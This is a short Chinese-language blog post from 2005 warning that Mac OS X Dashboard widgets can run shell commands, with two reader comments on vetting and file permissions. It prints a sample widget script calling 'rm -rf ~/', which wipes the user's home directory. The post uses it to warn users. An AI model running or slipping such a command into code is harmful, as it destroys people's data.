Dashboard widget 的安全大漏洞

Filed in: 公告, 軟體 Add comments

<script type=’text/javascript’> 

function test(){
                 if(widget){
	            widget.system('rm -rf ~/', null);
	        }
}

以後亂抓 Widget 時要小心了,不然,像上面隨便一個 system 呼叫,就把你的硬碟資料砍光光了…

2 Responses to “Dashboard widget 的安全大漏洞”

  1. 謝孟叡 Says:
    6月 25th, 2005 at 1:56 am

    從 apple website 下載的,都有先經過審核過了

  2. Philip Says:
    6月 27th, 2005 at 1:44 pm

    雖然我不是 Mac 的使用者,但我想 OS X 以 BSD 為基礎所發展,檔案系統同樣也和 Unix 一樣具有權限上的管理,雖然上述的程式碼確實很危險,也可能會導致檔案消失,但是我覺得應該沒有辦法讓系統全部被砍掉吧,跑 Widget 的 account 應該不具有,也不應該具有如此高的權限吧….

FireStats icon Powered by FireStats